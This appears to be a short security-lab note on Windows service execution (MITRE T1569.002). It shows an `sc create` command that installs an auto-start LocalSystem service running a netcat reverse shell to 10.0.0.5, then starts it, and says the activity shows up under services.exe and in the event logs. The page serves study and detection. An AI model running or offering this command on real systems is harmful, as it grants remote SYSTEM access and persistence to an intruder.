# Service Execution

## Execution

Creating an evil service with a netcat reverse shell:

```
C:\> sc create evilsvc binpath= "c:\tools\nc 10.0.0.5 443 -e cmd.exe" start= "auto" obj= "LocalSystem" password= ""
[SC] CreateService SUCCESS
C:\> sc start evilsvc
```

## Observations

The reverse shell lives under services.exe as expected:

![](https://3152193308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuuomMqs69rpH2Wnxhc3O%2Fuploads%2Fgit-blob-bef9bcd50782536ed31f48d7435ba0f9eec19d42%2Fservices-nc.png?alt=media)

Windows security, application, Service Control Manager and sysmon logs provide some juicy details:

![](https://3152193308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FuuomMqs69rpH2Wnxhc3O%2Fuploads%2Fgit-blob-9d6e9248af00fdbc35a5d56f05d155bab466ccb6%2Fservices-logs.png?alt=media)

## Reference

{% embed url="<https://attack.mitre.org/techniques/T1569/002/>" %}